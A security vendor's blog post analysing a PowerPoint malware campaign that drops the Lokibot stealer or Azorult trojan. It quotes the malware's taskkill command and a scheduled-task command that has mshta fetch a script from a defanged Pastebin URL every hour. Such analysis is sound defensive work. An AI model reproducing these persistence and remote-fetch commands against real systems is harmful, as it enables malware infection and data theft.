A malware campaign using PowerPoint as the infection vector caught our eye after we noticed it contained lyrics to a popular Drake song hidden inside a PowerShell command. Depending on the victim, it either dropped the Lokibot info stealer or Azorult remote access trojan. This infection chain all starts with a simple email, such as the example pictured below.
Upon opening either of the PowerPoint attachments, it automatically runs a heavily obfuscated visual basic script.
This script uses the Microsoft HTML application host (mshta.exe) to reach out to a Bitly shortened link (hxxp://j.mp/*) in an attempt to circumvent browser defense controls. It then uses the command line to task kill Excel & Word, if running.
"C:\Windows\System32\cmd.exe" /c taskkill /f /im excel.exe & taskkill /f /im winword.exe
After that, it creates a scheduled task for mshta to reach out to a Pastebin url every 60 minutes. This is where an encoded script is located and the url it retrieves dictates whether the recipient ultimately receives the Lokibot or Azorult payload in our samples.
"C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 60 /tn (+main+) /tr "mshta hxxp:\\pastebin[.]com\raw\C5qNg3Dr" /F
Once decoded, this translates into a PowerShell script that contains a reference to Drake's "Keke Do You Love Me" lyrics. This attacker “Master X”, retrieved from the metadata inside the PowerPoint, had a sense of humor when he was creating the invoke-expression cmdlet. "Master X" also obfuscated the ‘DownloadString’ inside this PowerShell script below in another attempt to avoid defense solutions monitoring PowerShell activity.
This script reaches out to paste.ee and downloads a malicious executable named calc.exe. We can see this retrieved malicious executable file header when loading up the paste.ee site.
Sanitized Indicators of Compromise:
Dropped executable file
Main object - "Purchase Order A6.pps"
Learn more about how advanced threat protection from Zix can help protect your organization from this and other threats.